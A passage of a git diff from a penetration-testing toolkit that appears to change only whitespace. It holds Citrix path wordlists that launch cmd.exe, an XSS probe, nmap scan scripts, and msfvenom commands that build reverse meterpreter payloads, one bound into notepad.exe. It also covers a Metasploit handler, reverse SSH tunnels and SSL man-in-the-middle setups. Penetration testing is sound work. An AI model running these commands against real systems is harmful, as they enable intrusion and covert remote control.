-/Citrix/AccessPlatform/site/launch.ica?InitialProgram=c:\windows\systems32\cmd.exe -/Citrix/AccessPlatform/site/launch.ica?InitialProgram=explorer.exe -/Citrix/AccessPlatform/site/launch.ica?NFuse_Application=Citrix.MPS.App.mstar123 -/Citrix/MetFrame/ -/Citrix/MetaFrame/auth/login.aspx -:80 -:135 -:443 -:1494 -:2512 -:2513 -:2598 -:8082 -/pcidss/launch_report?type=AA";alert('xss');x=" -/soap -/console.php -/forcerestart.php -/forcesd.php -/console.php -/config/edituser.php?username=1 -/login.php -/launch.jsp - +/Citrix/ +/Citrix/AccessPlatform/auth/ +/Citrix/AccessPlatform/media +/Citrix/AccessPlatform/auth/login.aspx +/Citrix/AccessPlatform/site/applist.aspx +/LogonAgent/Login.asp +/Citrix/NFuse16/ +/Citrix/NFuse151/ +/Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On +/Citrix/AccessPlatform/site/eswi.aspx +/Citrix/AccessPlatform/html/dummy +/Citrix/AccessPlatform/site/default.aspx +/Citrix/AccessPlatform/site/launcher.aspx +/Citrix/AccessPlatform/site/launch.ica +/CitrixAuthService/AuthService.asmx +/Citrix/AccessPlatform/App_Web_default.aspx +/Citrix/AccessPlatform/App_global.asax +/citrix/pnagent/conf +/Citrix/AccessPlatform/webinterface.conf +/Citrix/AccessPlatform/auth/agesso.aspx +/Citrix/AccessPlatform/site/default.aspx +/Citrix/AccessPlatform/site/applist.aspx +/Citrix/NFuse161/login.asp +/CITRIX/NFUSE/default/login.asp +/Citrix/AccessPlatform/site/wiac.aspx +/Citrix/NFuse151/ +/Citrix/AccessPlatform/site/appembed.aspx?NFuse_Application=Citrix.MPS.App.HYDRO +/Citrix/AccessPlatform/app_data/auth/include/layout.ascx +/Citrix/AccessPlatform/app_data/auth/include/style.inc +/Citrix/AccessPlatform/site/logout.aspx +/Citrix/AccessPlatform/site/clients.htm +/Citrix/Xenapp/ +/Citrix/XenApp/auth/login.aspx +/Citrix/PNAgent/config.xml +/citrix/metaframeexp/default/login.asp?ClientDetection=On +/citrix/metaframeexp/default/login.asp +/citrix/Nfuse17/ +/CITRIX/NFUSE/default/login.asp +/Citrix/NFuse161/login.asp +/citrix/MetaFrame/default/default.aspx +/Citrix/AccessPlatform/ +/Citrix/AccessPlatform/site/launch.ica?InitialProgram=cmd.exe +/Citrix/AccessPlatform/site/launch.ica?InitialProgram=c:\windows\systems32\cmd.exe +/Citrix/AccessPlatform/site/launch.ica?InitialProgram=explorer.exe +/Citrix/AccessPlatform/site/launch.ica?NFuse_Application=Citrix.MPS.App.mstar123 +/Citrix/MetFrame/ +/Citrix/MetaFrame/auth/login.aspx +:80 +:135 +:443 +:1494 +:2512 +:2513 +:2598 +:8082 +/pcidss/launch_report?type=AA";alert('xss');x=" +/soap +/console.php +/forcerestart.php +/forcesd.php +/console.php +/config/edituser.php?username=1 +/login.php +/launch.jsp + diff --git a/live-hosts/discover-live-hosts-top100.sh b/live-hosts/discover-live-hosts-top100.sh index 0c69fe5..e6ab32b 100644 --- a/live-hosts/discover-live-hosts-top100.sh +++ b/live-hosts/discover-live-hosts-top100.sh @@ -1,37 +1,37 @@ - #!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2019 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "For better results, please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - LOGNAME="live_hosts_tcp_top100_$1" - LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g') - LOGNAME2="$LOGNAME.txt" - nmap -sS -n -Pn --top-ports 100 --reason --open -T4 -oA $LOGNAME $1 | grep 'report' | grep -v 'host down' | grep -v 'closed ports' | sed 's/Nmap scan report for //' | sort -u -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | tee $LOGNAME2 -else - echo "Please provide the target IP range." -fi + #!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2019 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "For better results, please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + LOGNAME="live_hosts_tcp_top100_$1" + LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g') + LOGNAME2="$LOGNAME.txt" + nmap -sS -n -Pn --top-ports 100 --reason --open -T4 -oA $LOGNAME $1 | grep 'report' | grep -v 'host down' | grep -v 'closed ports' | sed 's/Nmap scan report for //' | sort -u -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | tee $LOGNAME2 +else + echo "Please provide the target IP range." +fi diff --git a/metasploit/binding.md b/metasploit/binding.md index 36b4187..2032347 100644 --- a/metasploit/binding.md +++ b/metasploit/binding.md @@ -1,7 +1,7 @@ -## File Binding - -### Executable files - -```bash -msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe -``` +## File Binding + +### Executable files + +```bash +msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe +``` diff --git a/metasploit/multi-handler.md b/metasploit/multi-handler.md index 1bafa40..57c9c02 100644 --- a/metasploit/multi-handler.md +++ b/metasploit/multi-handler.md @@ -1,51 +1,51 @@ -## Multi Handler - -### Run metasploit multi handler - -```bash -msfconsole -use exploit/multi/handler -set PAYLOAD windows/meterpreter/reverse_https -set LHOST example.com -set LPORT 443 -``` - -### Session will never timeout - -```bash -set SessionCommunicationTimeout 0 -``` - -### Execute commands on new session connection - -```bash -set autorunscript multi_console_command -cl "screenshot","sysinfo" -``` - -### Don’t exit once the first meterpreter connection is established - -```bash -set ExitOnSession false -``` - -### Run all meterpreter connections in the background automatically - -```bash -exploit -j -``` - -### List sessions - -```bash -sessions -l -``` - -### Interact with a shell - -```bash -sessions -i 5 -``` - -### Send interaction with session 5 to background - -Press ctrl+z +## Multi Handler + +### Run metasploit multi handler + +```bash +msfconsole +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https +set LHOST example.com +set LPORT 443 +``` + +### Session will never timeout + +```bash +set SessionCommunicationTimeout 0 +``` + +### Execute commands on new session connection + +```bash +set autorunscript multi_console_command -cl "screenshot","sysinfo" +``` + +### Don’t exit once the first meterpreter connection is established + +```bash +set ExitOnSession false +``` + +### Run all meterpreter connections in the background automatically + +```bash +exploit -j +``` + +### List sessions + +```bash +sessions -l +``` + +### Interact with a shell + +```bash +sessions -i 5 +``` + +### Send interaction with session 5 to background + +Press ctrl+z diff --git a/metasploit/payloads.md b/metasploit/payloads.md index 7c8b0a2..689fbd8 100644 --- a/metasploit/payloads.md +++ b/metasploit/payloads.md @@ -1,11 +1,11 @@ -## Payload Generation - -### Reverse https meterpreter - -```bash -msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe -``` - -```bash -msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe -``` +## Payload Generation + +### Reverse https meterpreter + +```bash +msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe +``` + +```bash +msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe +``` diff --git a/misc/helpful-commands.md b/misc/helpful-commands.md index 3de23c7..597a79c 100644 --- a/misc/helpful-commands.md +++ b/misc/helpful-commands.md @@ -1,8 +1,8 @@ -## Helpful commands during PT - -**duplicate the end of each line at the end of line itself** - -```bash -paste -d ' ' filename1 filename1 -``` - +## Helpful commands during PT + +**duplicate the end of each line at the end of line itself** + +```bash +paste -d ' ' filename1 filename1 +``` + diff --git a/misc/openvas.md b/misc/openvas.md index ef0c47f..db29f1b 100644 --- a/misc/openvas.md +++ b/misc/openvas.md @@ -1,16 +1,16 @@ -## OpenVAS - -### Initializing & Starting OpenVAS - -```bash -apt-get install openvas -openvas-setup -openvas-start -``` - -* https://127.0.0.1:9392 - -``` -Username: admin -Password: OpenVAS setup script -``` +## OpenVAS + +### Initializing & Starting OpenVAS + +```bash +apt-get install openvas +openvas-setup +openvas-start +``` + +* https://127.0.0.1:9392 + +``` +Username: admin +Password: OpenVAS setup script +``` diff --git a/misc/port-forwarding.md b/misc/port-forwarding.md index 4bb833f..a2a22bc 100644 --- a/misc/port-forwarding.md +++ b/misc/port-forwarding.md @@ -1,5 +1,5 @@ -## Port Forwarding - -### Linux Port Forwarding - -* rinetd +## Port Forwarding + +### Linux Port Forwarding + +* rinetd diff --git a/misc/socat.md b/misc/socat.md index a2aec79..7fb8b10 100644 --- a/misc/socat.md +++ b/misc/socat.md @@ -1,58 +1,58 @@ -## Socat Guide - -### Tunnel a connection from a local TCP port to a remote service -```bash -socat -v tcp4-listen:8181,reuseaddr,fork tcp4:x.x.x.x:80 -``` - -### Tunnel a plain text connection to an SSL endpoint -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Enable the use of a client side certificate (authentication)** -```bash -socat -v tcp4-listen:9000,reuseaddr,fork ssl:x.x.x.x:443,verify=0,cert=./mycert.pem -``` - -### Man in the middle an SSL connection - -**Diagram** -``` -Application ==SSL==> socat #1 —plain-text—> socat #2 ==SSL==> Remote service -``` - -**Shell 1** -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Shell 2** -```bash -socat -v openssl-listen:8282,cert=cert.pem,verify=0,reuseaddr,fork -tcp4:localhost:8181 -``` - -### Modify HTTP traffic in transit to disable gzip/deflage encodings - -**Diagram** -``` -Application ==SSL==> socat #1 —plain-text—> netsed —plain-text—> socat #2 ==SSL==> Remote service -``` - -**Shell 1** -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Shell 2** -```bash -netsed tcp 8282 127.0.0.1 8181 ‘s/gzip/ ‘ ‘s/deflate/ ‘ -``` - -**Shell 3** -```bash -socat -v openssl-listen:8383,cert=cert.pem,verify=0,reuseaddr,fork -tcp4:localhost:8282 -``` - +## Socat Guide + +### Tunnel a connection from a local TCP port to a remote service +```bash +socat -v tcp4-listen:8181,reuseaddr,fork tcp4:x.x.x.x:80 +``` + +### Tunnel a plain text connection to an SSL endpoint +```bash +socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Enable the use of a client side certificate (authentication)** +```bash +socat -v tcp4-listen:9000,reuseaddr,fork ssl:x.x.x.x:443,verify=0,cert=./mycert.pem +``` + +### Man in the middle an SSL connection + +**Diagram** +``` +Application ==SSL==> socat #1 —plain-text—> socat #2 ==SSL==> Remote service +``` + +**Shell 1** +```bash +socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Shell 2** +```bash +socat -v openssl-listen:8282,cert=cert.pem,verify=0,reuseaddr,fork +tcp4:localhost:8181 +``` + +### Modify HTTP traffic in transit to disable gzip/deflage encodings + +**Diagram** +``` +Application ==SSL==> socat #1 —plain-text—> netsed —plain-text—> socat #2 ==SSL==> Remote service +``` + +**Shell 1** +```bash +socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Shell 2** +```bash +netsed tcp 8282 127.0.0.1 8181 ‘s/gzip/ ‘ ‘s/deflate/ ‘ +``` + +**Shell 3** +```bash +socat -v openssl-listen:8383,cert=cert.pem,verify=0,reuseaddr,fork +tcp4:localhost:8282 +``` + diff --git a/misc/ssh.md b/misc/ssh.md index 0bb8c4b..2c30682 100644 --- a/misc/ssh.md +++ b/misc/ssh.md @@ -1,53 +1,53 @@ -## SSH Tunnels - -### Reverse SSH Tunnel - -*From the victim machine to our attacking box.* - -```bash -plink -l root -pw -R 3390:127.0.0.1:3389 -``` - -### SSH Local Port Forwarding - -```bash -ssh -L 0.0.0.0:4444::4444 -``` - -```bash -ssh -L 10443::443 user@ -``` - -```bash -ssh -L 0.0.0.0:45001::80 user@ -``` - -### SSH Dynamic Port Forwarding - -* Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy. -* SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim. -* Forward/Tunnel and redirect our traffic to the victim's machine. - -```bash -ssh -f -N -D 9050 root@victim.example.com -``` - -* proxychains - -```bash -nano /etc/proxychains.conf -``` - -* Content - -```bash -[ProxyList] -#... -socks4 127.0.0.1 9050 -``` - -* Run e.g. nmap - -```bash -proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open -``` +## SSH Tunnels + +### Reverse SSH Tunnel + +*From the victim machine to our attacking box.* + +```bash +plink -l root -pw -R 3390:127.0.0.1:3389 +``` + +### SSH Local Port Forwarding + +```bash +ssh -L 0.0.0.0:4444::4444 +``` + +```bash +ssh -L 10443::443 user@ +``` + +```bash +ssh -L 0.0.0.0:45001::80 user@ +``` + +### SSH Dynamic Port Forwarding + +* Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy. +* SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim. +* Forward/Tunnel and redirect our traffic to the victim's machine. + +```bash +ssh -f -N -D 9050 root@victim.example.com +``` + +* proxychains + +```bash +nano /etc/proxychains.conf +``` + +* Content + +```bash +[ProxyList] +#... +socks4 127.0.0.1 9050 +``` + +* Run e.g. nmap + +```bash +proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open +``` diff --git a/misc/stunnel.md b/misc/stunnel.md index 9c7692e..650d50c 100644 --- a/misc/stunnel.md +++ b/misc/stunnel.md @@ -1,89 +1,89 @@ -## stunnel Guide - -### Installation - -```bash -sudo apt-get install stunnel4 -``` - -### Certificate - -```bash -cd /etc/stunnel -openssl genrsa -out stunnel.key 2048 -openssl req -new -key stunnel.key -out stunnel.csr -openssl x509 -req -days 365 -in stunnel.csr -signkey stunnel.key -out stunnel.crt -cat stunnel.crt stunnel.key > stunnel.pem -chmod 640 stunnel.key stunnel.pem -``` - -### Server - -* Run stunnel in server mode, listening on port 44444 and forwarding traffic to Burp Pro on 127.0.0.1:8080. - -```bash -cd /etc/stunnel -sudo nano server.conf -``` - -#### Contents - -``` -[stunnel-burp-server] -client = no -accept = 44444 -connect = 8080 -cert = /etc/stunnel/stunnel.pem -``` - -### Burp - -* Set Burp on invisible mode(Proxy->Options->Proxy Listeners->Edit->Request handling->Check Support invisible proxying..) -* Configure an upstream proxy server to forward all your traffic to 127.0.0.1 and port 22222. - -### Client - -* Run second stunnel in client mode, listening on port 22222 and forwarding all traffic to the IP address that corresponds to the target host. - -```bash -cd /etc/stunnel -sudo nano client.conf -``` - -#### Contents - -``` -[stunnel-burp-client] -client = yes -accept = 127.0.0.1:22222 -connect = target.ip.address:443 -cert = /etc/stunnel/stunnel.pem -``` - - -### Hosts file - -* Add a hosts file entry for your target host to resolve to 127.0.0.1. - -```bash -sudo nano /etc/hosts -127.0.0.1 target.example.com -``` - -### Stunnel - -```bash -stunnel4 /etc/stunnel/server.conf -stunnel4 /etc/stunnel/client.conf -``` - -#### Check if ports are opened - -```bash -sudo netstat -plnt | grep 44444 -sudo netstat -plnt | grep 22222 -``` - -### Testing - -* Now browse to https://target.example.com:44444 +## stunnel Guide + +### Installation + +```bash +sudo apt-get install stunnel4 +``` + +### Certificate + +```bash +cd /etc/stunnel +openssl genrsa -out stunnel.key 2048 +openssl req -new -key stunnel.key -out stunnel.csr +openssl x509 -req -days 365 -in stunnel.csr -signkey stunnel.key -out stunnel.crt +cat stunnel.crt stunnel.key > stunnel.pem +chmod 640 stunnel.key stunnel.pem +``` + +### Server + +* Run stunnel in server mode, listening on port 44444 and forwarding traffic to Burp Pro on 127.0.0.1:8080. + +```bash +cd /etc/stunnel +sudo nano server.conf +``` + +#### Contents + +``` +[stunnel-burp-server] +client = no +accept = 44444 +connect = 8080 +cert = /etc/stunnel/stunnel.pem +``` + +### Burp + +* Set Burp on invisible mode(Proxy->Options->Proxy Listeners->Edit->Request handling->Check Support invisible proxying..) +* Configure an upstream proxy server to forward all your traffic to 127.0.0.1 and port 22222. + +### Client + +* Run second stunnel in client mode, listening on port 22222 and forwarding all traffic to the IP address that corresponds to the target host. + +```bash +cd /etc/stunnel +sudo nano client.conf +``` + +#### Contents + +``` +[stunnel-burp-client] +client = yes +accept = 127.0.0.1:22222 +connect = target.ip.address:443 +cert = /etc/stunnel/stunnel.pem +``` + + +### Hosts file + +* Add a hosts file entry for your target host to resolve to 127.0.0.1. + +```bash +sudo nano /etc/hosts +127.0.0.1 target.example.com +``` + +### Stunnel + +```bash +stunnel4 /etc/stunnel/server.conf +stunnel4 /etc/stunnel/client.conf +``` + +#### Check if ports are opened + +```bash +sudo netstat -plnt | grep 44444 +sudo netstat -plnt | grep 22222 +``` + +### Testing + +* Now browse to https://target.example.com:44444 diff --git a/nessus/extract-info-nessus.md b/nessus/extract-info-nessus.md index 620b550..cd3342c 100644 --- a/nessus/extract-info-nessus.md +++ b/nessus/extract-info-nessus.md @@ -1,28 +1,28 @@ -## Nessus Information - -* Export Scan results as a csv file. - -### Export Critical Vulnerabilities - -```bash -cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export High Vulnerabilities - -```bash -cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export Medium Vulnerabilities - -```bash -cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export Low Vulnerabilities - -```bash -cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - +## Nessus Information + +* Export Scan results as a csv file. + +### Export Critical Vulnerabilities + +```bash +cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export High Vulnerabilities + +```bash +cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export Medium Vulnerabilities + +```bash +cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export Low Vulnerabilities + +```bash +cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + diff --git a/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh index 1be5de1..e5d2a8b 100644 --- a/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh +++ b/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh @@ -1,34 +1,34 @@ -#!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2018 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "Please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1 -else - echo "Please provide the target IP address or an IP range." -fi +#!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2018 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "Please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1 +else + echo "Please provide the target IP address or an IP range." +fi diff --git a/port-scanning/udp/full/udp-ports-scan-full-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-nodns.sh index 89c393a..cd90474 100755 --- a/port-scanning/udp/full/udp-ports-scan-full-nodns.sh +++ b/port-scanning/udp/full/udp-ports-scan-full-nodns.sh @@ -1,34 +1,34 @@ -#!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2018 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "Please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1 -else - echo "Please provide the target IP address or an IP range." -fi +#!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2018 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "Please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1 +else + echo "Please provide the target IP address or an IP range." +fi diff --git a/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh index 4ae8473..ec7a0d4 100755 --- a/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh +++ b/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh @@ -1,34 +1,34 @@ -#!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2018 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "Please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1 -else - echo "Please provide the target IP address or an IP range." -fi +#!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2018 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "Please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1 +else + echo "Please provide the target IP address or an IP range." +fi diff --git a/port-scanning/udp/full/udp-ports-scan-full-noping.sh b/port-scanning/udp/full/udp-ports-scan-full-noping.sh index 8f306b6..78ace85 100755 --- a/port-scanning/udp/full/udp-ports-scan-full-noping.sh +++ b/port-scanning/udp/full/udp-ports-scan-full-noping.sh @@ -1,34 +1,34 @@ -#!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2018 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "Please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1 -else - echo "Please provide the target IP address or an IP range." -fi +#!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2018 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# +# For more see the file 'LICENSE' for copying permission. + + +if [[ $EUID -ne 0 ]]; then + echo "Please run this script as root." 1>&2 + exit 1 +fi + +if [ $# -eq 1 ]; then + nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1 +else + echo "Please provide the target IP address or an IP range." +fi diff --git a/port-scanning/udp/full/udp-ports-scan-full.sh b/port-scanning/udp/full/udp-ports-scan-full.sh index f1eeaf7..aaffce5 100755 --- a/port-scanning/udp/full/udp-ports-scan-full.sh +++ b/port-scanning/udp/full/udp-ports-scan-full.sh @@ -1,34 +1,34 @@ -#!/bin/bash - -# This file is part of PenTestKit -# Copyright (C) 2017-2018 @maldevel -# https://github.com/maldevel/PenTestKit -# -# PenTestKit - Useful tools for Penetration Testing. -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -# For more see the file 'LICENSE' for copying permission. - - -if [[ $EUID -ne 0 ]]; then - echo "Please run this script as root." 1>&2 - exit 1 -fi - -if [ $# -eq 1 ]; then - nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1 -else - echo "Please provide the target IP address or an IP range." -fi +#!/bin/bash + +# This file is part of PenTestKit +# Copyright (C) 2017-2018 @maldevel +# https://github.com/maldevel/PenTestKit +# +# PenTestKit - Useful tools for Penetration Testing. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General 